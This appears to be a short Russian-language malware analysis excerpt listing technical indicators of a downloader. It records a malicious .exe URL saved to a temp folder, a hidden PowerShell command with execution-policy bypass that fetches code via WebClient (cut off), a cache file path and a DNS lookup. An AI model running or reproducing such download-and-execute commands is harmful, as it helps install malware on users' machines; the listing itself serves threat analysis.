Техническая информация
- http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe как %temp%\roe.exe
- '<SYSTEM32>\cmd.exe' /c cd ValhallaSpauldingcoffeeprizetrepidationshowmenArrheniussoughtdiagonalsynchrony & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClien...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK w2###pbza0zj.pw
- '<SYSTEM32>\cmd.exe' /c cd ValhallaSpauldingcoffeeprizetrepidationshowmenArrheniussoughtdiagonalsynchrony & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClien... (со скрытым окном)